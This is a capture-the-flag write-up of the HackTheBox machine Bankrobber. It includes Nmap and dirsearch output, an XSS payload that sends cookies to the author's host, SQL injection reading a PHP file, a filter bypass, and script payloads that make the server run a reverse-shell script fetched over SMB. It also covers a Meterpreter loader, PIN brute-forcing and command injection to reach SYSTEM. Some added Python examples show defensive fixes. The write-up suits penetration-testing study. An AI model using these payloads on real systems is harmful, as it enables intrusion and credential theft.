Quick Summary
→ Insane machine – Bankrobber is a web application vulnerable to XSS, SQL Injection and RCE. I use XSS to steal the admin credentials, SQL Injection to study how backdoorchecker.php works, and command injection from the web application to get a reverse shell. Inside the machine I set up port forwarding to test the e-coin transfer; from there I inject RCE and get root.
Penetration Testing Methodologies
Network Scanning
→ Nmap scan
→ discover open ports and what services are running
Enumeration
→ Browsing the HTTP Service
→ MySQL and SMB open
→ Bruteforce the Web page directories
Post - Exploitation
→ Create account and Login
→ Transfer any amount of e-coin
→ Do client side attack
→ Use XSS to steal admin credentials
→ Login as admin and find something interesting in the page
Exploitation
→ Found XSS and SQL Injection vulnerabilities in search.php and backdoorchecker.php
→ Upload a webshell to the server and get a reverse shell
Privilege Escalation
→ Use winPE or Windows privilege escalation with cmd
→ Look at running processes and active connections inside the machine
→ Use an obfuscated Meterpreter and tunnel the network with port forwarding
→ Bruteforce the digit code and test the e-coin transfer
→ Found RCE (Remote Code Execution) in the e-coin transfer
→ Gain the Administrator shell
Network Scanning
Walkthrough
→ First, I run Nmap to scan the target and get information about the services running on the target machine. I use:
- -sV ⇒ probe open ports to determine service/version info
- -sC ⇒ equivalent to --script=default
- -p- ⇒ scan all 65535 ports
- -oN ⇒ save the scan results to a text file
nmap -sV -sC -p- 10.10.10.154 -oN nmap-Bankrobber
Nmap results, which found open ports 80, 443, 445 and 3306:
root in htb/boxes/Bankrobber ❯ nmap -sV -sC -p- nmap-bankrobber -oN 10.10.10.154
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-08 03:12 PST
Nmap scan report for 10.10.10.154
Host is up (0.23s latency).
Not shown: 996 filtered ports
PORT     STATE SERVICE    VERSION
80/tcp   open  tcpwrapped
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
|_http-title: E-coin
443/tcp  open  tcpwrapped
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
|_http-title: Bad request!
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
445/tcp  open  tcpwrapped
3306/tcp open  tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone
Running (JUST GUESSING): Microsoft Windows 2008|10|Phone (90%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (90%), Microsoft Windows 10 1511 - 1607 (85%), Microsoft Windows 8.1 Update 1 (85%), Microsoft Windows Phone 7.5 or 8.0 (85%)
No exact OS matches for host (test conditions non-ideal).

Host script results:
|_clock-skew: mean: 1h02m13s, deviation: 0s, median: 1h02m13s
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-03-07T20:15:16
|_  start_date: 2020-03-07T10:51:24

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.81 seconds
root in htb/boxes/Bankrobber took 1m19s ❯
Enumeration
I visited the web page on port 80 and it presents a Bitcoin web page with Login and Register forms.
MySQL on port 3306
The MySQL port is open, so I try to connect to it, but the connection is refused:
root in htb/boxes/Bankrobber ❯ mysql -h 10.10.10.154 --port 3306
ERROR 1130 (HY000): Host '10.10.15.71' is not allowed to connect to this MariaDB server
SMB on port 445
Connecting to SMB is not helpful either.
root in htb/boxes/Bankrobber took 2s ❯ smbmap -H 10.10.10.154 -u bank
[+] Finding open SMB ports....
[!] Authentication error on 10.10.10.154
[!] Authentication error on 10.10.10.154
Bruteforce Web directories
I also run the dirsearch web path scanner to look for any interesting web directories.
root in dirsearch on master via 🐍 v2.7.17 ❯ ./dirsearch.py -u "http://10.10.10.154" -e asd -t 50

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: asd | HTTP method: get | Threads: 50 | Wordlist size: 6109

Error Log: /opt/dirsearch/logs/errors-20-03-06_18-13-45.log

Target: http://10.10.10.154

[18:13:46] Starting:
[18:13:47] 403 - 1KB - /%3f/
[18:13:47] 403 - 1KB - /%20../
[18:13:47] 403 - 1KB - /%ff/
[18:13:49] 403 - 1KB - /.htaccessOLD
[18:13:49] 403 - 1KB - /.ht_wsr.txt
[18:13:49] 403 - 1KB - /.htaccess-marco
[18:13:49] 403 - 1KB - /.htaccess-local
[18:13:49] 403 - 1KB - /.hta
[18:13:49] 403 - 1KB - /.htaccess-dev
[18:13:49] 403 - 1KB - /.htaccess.sample
[18:13:49] 403 - 1KB - /.htaccess.BAK
[18:13:49] 403 - 1KB - /.htaccess_orig
[18:13:49] 403 - 1KB - /.htaccess.bak1
[18:13:49] 403 - 1KB - /.htaccess.txt
[18:13:49] 403 - 1KB - /.htaccess_sc
[18:13:49] 403 - 1KB - /.htaccess.old
[18:13:49] 403 - 1KB - /.htaccess_extra
[18:13:49] 403 - 1KB - /.htaccess.orig
[18:13:49] 403 - 1KB - /.htaccess.save
[18:13:49] 403 - 1KB - /.htaccessOLD2
[18:13:49] 403 - 1KB - /.htaccess~
[18:13:49] 403 - 1KB - /.htaccessBAK
[18:13:49] 403 - 1KB - /.htgroup
[18:13:49] 403 - 1KB - /.htpasswd-old
[18:13:49] 403 - 1KB - /.htpasswd_test
[18:13:49] 403 - 1KB - /.htpasswds
[18:13:49] 403 - 1KB - /.htusers
[18:13:54] 301 - 336B - /Admin -> http://10.10.10.154/Admin/
[18:13:54] 301 - 336B - /admin -> http://10.10.10.154/admin/
[18:13:54] 200 - 40B - /admin%20/
[18:13:54] 301 - 336B - /ADMIN -> http://10.10.10.154/ADMIN/
[18:13:54] 301 - 337B - /admin. -> http://10.10.10.154/admin./
[18:13:55] 403 - 1KB - /admin/.htaccess
[18:13:55] 200 - 40B - /admin/?/login
[18:13:55] 200 - 40B - /admin/
[18:13:55] 200 - 40B - /admin/index.php
[18:14:05] 403 - 1KB - /cgi-bin/
[18:14:10] 301 - 334B - /css -> http://10.10.10.154/css/
[18:14:15] 403 - 1KB - /error/
[18:14:17] 503 - 1KB - /examples/servlets/index.html
[18:14:17] 503 - 1KB - /examples/servlets/servlet/RequestHeaderExample
[18:14:17] 503 - 1KB - /examples/servlets/servlet/CookieExample
[18:14:17] 503 - 1KB - /examples
[18:14:17] 503 - 1KB - /examples/
[18:14:17] 301 - 336B - /fonts -> http://10.10.10.154/fonts/
[18:14:21] 301 - 334B - /img -> http://10.10.10.154/img/
[18:14:22] 200 - 8KB - /index.PHP
[18:14:22] 200 - 8KB - /INDEX.PHP
[18:14:22] 200 - 8KB - /index.php
[18:14:22] 200 - 8KB - /index.php/login/
[18:14:24] 301 - 333B - /js -> http://10.10.10.154/js/
[18:14:26] 302 - 0B - /login.php -> index.php
[18:14:32] 403 - 1KB - /phpmyadmin
[18:14:34] 403 - 1KB - /phpmyadmin/
[18:14:34] 403 - 1KB - /phpmyadmin/scripts/setup.php
[18:14:36] 200 - 0B - /register.php
[18:14:37] 403 - 1KB - /server-info
[18:14:37] 403 - 1KB - /server-status
[18:14:37] 403 - 1KB - /server-status/
[18:14:45] 403 - 1KB - Trace.axd::$DATA
[18:14:45] 301 - 335B - /user -> http://10.10.10.154/user/
[18:14:45] 200 - 39B - /user/
[18:14:46] 403 - 1KB - web.config::$DATA

Task Completed
root in dirsearch on master via 🐍 v2.7.17 took 1m3s ❯
The web directories that caught my attention are these:
[18:13:55] 200 - 40B - /admin/?/login
[18:13:55] 200 - 40B - /admin/
[18:13:55] 200 - 40B - /admin/index.php
Post - Exploitation
Create account and Login
To test, I created an account and logged in with it. Next, I visited /admin/index.php and it says You're not authorized to view this page. For me this is really weird; if you have experience in web development you will notice that there is a misconfiguration in this website.
Steal Admin creds via Cookies
Now I need to get the credentials of the admin. I look at the page source for a hint but I do not see anything. Then I try the e-coin transfer on the user page and this alert caught my attention.
It looks like the admin is checking each transfer transaction, so I intercept it with Burp Suite (a web penetration testing tool).
Using this payload from PayloadsAllTheThings:
# xss
<img src=x onerror=this.src="http://10.10.15.71/?c="%2bdocument.cookie>
My user ID here is #4, and my username and password are stored in the cookie in base64 format. toId= is the ID I transfer my e-coin to. I first set up my nc listener on port 80, then I modify the intercepted transfer with my payload and send it.
After 5-10 minutes of waiting, I get a response on my nc listener: the username and password of the admin, in base64 format.
Decoding it to plaintext gives me the admin creds.
username: admin password: Hopelessromantic
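An added example (not from the writeup) that audits Set-Cookie headers for exactly what made this theft possible: credentials kept base64-encoded in cookies that are readable from document.cookie because HttpOnly, Secure and SameSite are missing. The sample headers are constructed to model the e-coin app; the cookie names and the name regex are assumptions.

```python
import base64
import binascii
import re

# Cookie names that should never be script-readable or carry encoded secrets (assumed list).
SENSITIVE_NAME = re.compile(r"pass|pwd|secret|token|sess|user", re.IGNORECASE)

def looks_like_base64_text(value: str) -> bool:
    """True if value is valid base64 that decodes to printable text: encoded, not protected."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return bool(raw) and all(32 <= b < 127 for b in raw)

def audit_set_cookie(header: str) -> dict:
    """Parse one Set-Cookie header and list the weaknesses an XSS payload can exploit."""
    body = header.split(":", 1)[1] if header.lower().startswith("set-cookie:") else header
    parts = [p.strip() for p in body.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
    findings = []
    if "httponly" not in attrs:
        findings.append("no HttpOnly: document.cookie exposes it to injected script")
    if "secure" not in attrs:
        findings.append("no Secure: sent over plain HTTP (port 80)")
    if "samesite" not in attrs:
        findings.append("no SameSite: attached to cross-site requests")
    if SENSITIVE_NAME.search(name) and looks_like_base64_text(value):
        findings.append("credential-like cookie holding base64-encoded plaintext")
    return {"name": name, "findings": findings}

def audit_all(headers):
    """Map cookie name -> findings for a list of Set-Cookie headers."""
    return {r["name"]: r["findings"] for r in map(audit_set_cookie, headers)}

# Constructed sample headers modelled on the e-coin app: the username and
# password cookies are base64 of the plaintext values and carry no flags.
SAMPLE_HEADERS = [
    "Set-Cookie: username=" + base64.b64encode(b"admin").decode() + "; path=/",
    "Set-Cookie: password=" + base64.b64encode(b"example-only").decode() + "; path=/",
    "Set-Cookie: PHPSESSID=k3j4-h5g6; Path=/; HttpOnly; Secure; SameSite=Strict",
]

if __name__ == "__main__":
    for name, findings in audit_all(SAMPLE_HEADERS).items():
        print(name, "->", findings or ["ok"])
```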
Login as Admin
Now that I have the admin credentials, I log in as admin and find some interesting capabilities, and there is a NOTES.TXT inside the admin page.
Looking at the notes, I don't know exactly what they mean, but there are two things I am sure of.
⇒ The default XAMPP installation folder is C:\xampp\htdocs\, where you can run a local web server.
⇒ There was a vulnerability in the encoded comments, for every IP address.
Next, the two interesting things I found inside the admin page are Search users and Backdoorchecker.
I try to search my ID # in Search users (beta). When something is labelled beta it is not fully functional; there are existing bugs and errors in it.
Backdoorchecker
⇒ Due to recent hacking attempts on the server, the Backdoorchecker feature is only accessible from localhost, as it returns the following message when I try any command:
There is a possibility that this feature is vulnerable to SQLi.
Exploitation
XSS and SQL Injection
I intercept the Search users function using Burp Suite and try SQL Injection. term=4 is my user ID #. After sending this to Repeater, I use this SQL syntax to check how backdoorchecker.php works:
term=4' union all select 1,LOAD_FILE('C:\\xampp\\htdocs\\admin\\backdoorchecker.php'),3-- -
and I got this response:
HTTP/1.1 200 OK
Date: Sun, 08 Mar 2020 20:30:14 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
X-Powered-By: PHP/7.3.4
Content-Length: 1169
Connection: close
Content-Type: text/html; charset=UTF-8

<table width='90%'><tr><th>ID</th><th>User</th></tr>
<tr><td>4</td><td>medz</td></tr>
<tr><td>1</td><td><?php
include('../link.php');
include('auth.php');

$username = base64_decode(urldecode($_COOKIE['username']));
$password = base64_decode(urldecode($_COOKIE['password']));
$bad  = array('$(','&');
$good = "ls";
if(strtolower(substr(PHP_OS,0,3)) == "win"){
    $good = "dir";
}
if($username == "admin" && $password == "Hopelessromantic"){
    if(isset($_POST['cmd'])){
        foreach($bad as $char){
            if(strpos($_POST['cmd'],$char) !== false){
                die("You're not allowed to do that.");
            }
        }
        if(substr($_POST['cmd'], 0,strlen($good)) != $good){
            die("It's only allowed to use the $good command");
        }
        if($_SERVER['REMOTE_ADDR'] == "::1"){
            system($_POST['cmd']);
        } else {
            echo "It's only allowed to access this function from localhost (::1).<br> This is due to the recent hack attempts on our server.";
        }
    }
} else {
    echo "You are not allowed to use this function!";
}
?></td></tr></table>
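As an added example (not code from the writeup), a Python/sqlite3 model of the search.php bug: the term value is pasted into the SQL string, so a three-column UNION rides along with the lookup, while the same query with a bound parameter returns nothing for the injected term. The table names and rows are constructed; sqlite has no LOAD_FILE(), and on MySQL/MariaDB that file read also needs the application's database account to hold the FILE privilege, so revoking it is the second fix after parameterising the query.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the e-coin database (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, role TEXT);
        INSERT INTO users VALUES (1, 'admin', 'admin'), (4, 'medz', 'user');
        -- stands in for data the search endpoint was never meant to return,
        -- the way LOAD_FILE() pulled backdoorchecker.php off disk on the box
        CREATE TABLE secrets (id INTEGER, body TEXT);
        INSERT INTO secrets VALUES (1, 'file contents the app never meant to expose');
    """)
    return conn

def search_vulnerable(conn, term: str):
    """search.php-style query: term is pasted straight into the SQL string."""
    sql = f"SELECT id, username, role FROM users WHERE id = '{term}'"
    return conn.execute(sql).fetchall()

def search_safe(conn, term: str):
    """Same lookup with a bound parameter; term can only ever be a value."""
    return conn.execute(
        "SELECT id, username, role FROM users WHERE id = ?", (term,)
    ).fetchall()

# Same shape as the writeup's payload: close the quote, UNION a three-column
# SELECT (column count must match), comment out the trailing quote.
INJECTED_TERM = "4' union all select 1, body, 3 from secrets-- -"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, term=4       :", search_vulnerable(db, "4"))
    print("vulnerable, injected term:", search_vulnerable(db, INJECTED_TERM))
    print("parameterised, injected  :", search_safe(db, INJECTED_TERM))
```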
– sql injection
So the request has to come from localhost, the first 3 characters of the command must be "dir", and the characters '$(' and '&' are not allowed.
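An added example, not the page's code, that models the checks backdoorchecker.php applies to cmd in Python and puts a whole-command allowlist beside them: the original denylist and prefix test let through any command that merely starts with dir, while the allowlist accepts only dir with at most one plain path argument (the regex is an assumption). The REMOTE_ADDR check is not modelled; it is satisfied by the admin's own browser, which is why the page's XSS route works, and needs a CSRF token rather than an address check.

```python
import re

# Constants mirror $bad and $good from the PHP on a Windows host.
BAD_SUBSTRINGS = ("$(", "&")    # $bad: two-entry denylist
GOOD_PREFIX = "dir"             # $good

def original_filter(cmd: str) -> bool:
    """True when the original PHP would hand cmd to system()."""
    if any(bad in cmd for bad in BAD_SUBSTRINGS):
        return False                                  # "You're not allowed to do that."
    return cmd[:len(GOOD_PREFIX)] == GOOD_PREFIX      # only the prefix is inspected

# Hardened check (assumed design): match the whole command against an allowlist
# instead of a prefix plus a denylist. Only the literal "dir", optionally
# followed by one plain path argument, is accepted; '|', '&', ';', '$', quotes
# and newlines are rejected because they are simply not in the character class.
_ALLOWED = re.compile(r"dir(?: [A-Za-z0-9_.:\\-]+)?")

def hardened_filter(cmd: str) -> bool:
    """True only for 'dir' or 'dir <single plain path>'."""
    return _ALLOWED.fullmatch(cmd) is not None

def compare(cmd: str):
    """Return (passes_original, passes_hardened) for one candidate command."""
    return original_filter(cmd), hardened_filter(cmd)

# Constructed inputs: benign uses, the writeup's prefix bypass, and the two
# tokens the denylist does catch.
SAMPLES = {
    "dir": compare("dir"),
    "dir C:\\xampp\\htdocs": compare("dir C:\\xampp\\htdocs"),
    "dirasdf || ping 10.10.15.71": compare("dirasdf || ping 10.10.15.71"),
    "dir & dir": compare("dir & dir"),
    "dir $(dir)": compare("dir $(dir)"),
}

if __name__ == "__main__":
    for cmd, (orig, hard) in SAMPLES.items():
        print(f"{cmd!r:32} original={orig!s:5} hardened={hard}")
```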
To execute code I use the PhantomJS bot (via XSS) to send a POST request to backdoorchecker.php with a filter bypass inside the parameter.
To confirm it, I have the target ping my Kali Linux machine while tcpdump is running there. I used:
dirasdf || ping 10.10.15.71
and my Kali Linux machine gets a response from Bankrobber:
root in htb/boxes/Bankrobber ❯ tcpdump -i tun0
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
07:25:28.957530 IP 10.10.15.71.41236 > 10.10.10.154.http: Flags [S], seq 2958480018, win 64240, options [mss 1460,sackOK,TS val 2421326422 ecr 0,nop,wscale 7], length 0
07:25:29.208067 IP 10.10.15.71.41238 > 10.10.10.154.http: Flags [S], seq 339059589, win 64240, options [mss 1460,sackOK,TS val 2421326672 ecr 0,nop,wscale 7], length 0
07:25:29.967531 IP 10.10.15.71.41236 > 10.10.10.154.http: Flags [S], seq 2958480018, win 64240, options [mss 1460,sackOK,TS val 2421327432 ecr 0,nop,wscale 7], length 0
07:25:30.222861 IP 10.10.15.71.41238 > 10.10.10.154.http: Flags [S], seq 339059589, win 64240, options [mss 1460,sackOK,TS val 2421327687 ecr 0,nop,wscale 7], length 0
07:25:31.983082 IP 10.10.15.71.41236 > 10.10.10.154.http: Flags [S], seq 2958480018, win 64240, options [mss 1460,sackOK,TS val 2421329447 ecr 0,nop,wscale 7], length 0
07:25:32.239634 IP 10.10.15.71.41238 > 10.10.10.154.http: Flags [S], seq 339059589, win 64240, options [mss 1460,sackOK,TS val 2421329704 ecr 0,nop,wscale 7], length 0
07:25:34.209667 IP 10.10.15.71.41240 > 10.10.10.154.http: Flags [S], seq 232555969, win 64240, options [mss 1460,sackOK,TS val 2421331674 ecr 0,nop,wscale 7], length 0
07:25:35.215733 IP 10.10.15.71.41240 > 10.10.10.154.http: Flags [S], seq 232555969, win 64240, options [mss 1460,sackOK,TS val 2421332680 ecr 0,nop,wscale 7], length 0
07:25:36.015323 IP 10.10.15.71.41236 > 10.10.10.154.http: Flags [S], seq 2958480018, win 64240, options [mss 1460,sackOK,TS val 2421333479 ecr 0,nop,wscale 7], length 0
07:25:37.231355 IP 10.10.15.71.41240 > 10.10.10.154.http: Flags [S], seq 232555969, win 64240, options [mss 1460,sackOK,TS val 2421334695 ecr 0,nop,wscale 7], length 0
07:25:44.207219 IP 10.10.15.71.41236 > 10.10.10.154.http: Flags [S], seq 2958480018, win 64240, options [mss 1460,sackOK,TS val 2421341671 ecr 0,nop,wscale 7], length 0
07:26:00.335356 IP 10.10.15.71.41236 > 10.10.10.154.http: Flags [S], seq 2958480018, win 64240, options [mss 1460,sackOK,TS val 2421357799 ecr 0,nop,wscale 7], length 0
Get Reverse Shell
To exploit these vulnerabilities and get a reverse shell, I used Nishang (Offensive PowerShell for red teaming, penetration testing and offensive security). I use the script Invoke-PowerShellTcp.ps1 and rename it to evil.ps1.
I call it with PowerShell through an Impacket SMB server and set up an nc listener on my Kali Linux.
# javascript
<script>var xh;if (window.XMLHttpRequest) {xh=new XMLHttpRequest()}else{xh=new ActiveXObject("Microsoft.XMLHTTP")};xh.open("POST","/admin/backdoorchecker.php");xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');xh.send("cmd=dirasdf || copy \\\\10.10.15.71\\test\\dfuck");</script>
&amount=<script>var xh;if (window.XMLHttpRequest) {xh=new XMLHttpRequest()}else{xh=new ActiveXObject("Microsoft.XMLHTTP")};xh.open("POST","/admin/backdoorchecker.php");xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');xh.send("cmd=dirasdf || copy \\\\10.10.15.71\\test\\dfuck");</script>
&comment=<script>var xh;if (window.XMLHttpRequest) {xh=new XMLHttpRequest()}else{xh=new ActiveXObject("Microsoft.XMLHTTP")};xh.open("POST","/admin/backdoorchecker.php");xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');xh.send("cmd=dirasdf || powershell -exec bypass -f \\\\10.10.15.71\\test\\evil.ps1");</script>
After 5-10 minutes, my impacket-smbserver gets a connection and I get into the Bankrobber machine.
And finally I have user.txt.
Privilege Escalation
Recon
For reconnaissance I used winPE, or Windows privilege escalation with cmd; it is a tool similar to LinEnum.
It helps automate penetration tests: it performs discovery on the environment it runs in and tries to find weaknesses that allow privilege escalation, saving time and allowing more effort to be put toward getting root.
Process and Active Connections
Running this takes time; after 10-15 minutes I have the output.
System info of Bankrobber
I see something odd listening on port 910, and a suspicious background process named bankv2.exe whose PID #1632 is the same as the one listening on port 910.
Customizing a custom Meterpreter loader
So I tunnel local port 910 on my Kali Linux system to port 910 on Bankrobber. To do so I created an obfuscated Meterpreter; see this:
https://astr0baby.wordpress.com/2013/10/17/customizing-custom-meterpreter-loader/
Run the bash script and check the payload file:
****************************************************************
Automatic C source code generator - FOR METASPLOIT
Based on rsmudge metasploit-loader
****************************************************************
Metasploit server IP : 10.10.15.71
Metasploit port number : 9001
Compiling binary ..
In file included from temp.c:4:
/usr/share/mingw-w64/include/winsock2.h:15:2: warning:
 ^~~~~~~
-rwxr-xr-x 1 root root 292503 Mar 8 09:08 payload.exe
I uploaded it to Bankrobber and executed it, then I set up a Meterpreter session:
Metasploit meterpreter
Now that I have the Meterpreter session, the next thing I did is port forwarding:
root in htb/boxes/Bankrobber meterpreter > portfwd add -l 910 -p 910 -r 127.0.0.1
[*] Local TCP relay created: :910 <-> 127.0.0.1:910
And connect to the port using nc -vn 127.0.0.1 910 and it works! Next I try to input a digit code, 1234, but it is not working.
Brute force the digit code
Since I don't know the exact digit code, I decided to brute-force it from the bash command line, even though I have a feeling that I could get blocked by doing this. So:
root in htb/boxes/Bankrobber ❯ for i in {0..9}{0..9}{0..9}{0..9}; do echo $i; echo $i | nc -vn 127.0.0.1 910; done
After a few seconds I get the right digit code: 0021.
When I log in with this PIN, I can transfer e-coins and I see that the transfer.exe process inside is executed:
⇒ [$] Executing e-coin transfer tool: C:\Users\admin\Documents\transfer.exe
Remote Code Execution (RCE)
Now, there is a possible RCE in that process.
I exploited the e-coin transfer by running my payload inside the Bankrobber machine and creating Meterpreter sessions.
Instead of putting an amount of e-coins in the e-coin transfer, I executed my payload with this line:
& ..\\..\\..\\..\\..\\..\Users\\C:\Users\Cortin\payload.exe
After executing it I got a response in my Meterpreter session.
Administrator Shell
root in htb/boxes/Bankrobber meterpreter > shell
Process 584 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. Alle rechten voorbehouden.
And finally rooted!
⇒ nt authority\system
Get root.txt
If you liked my writeup please leave a respect on my Profile
References:
Port 910
Customize Meterpreter Payload
XSS with Phantom JS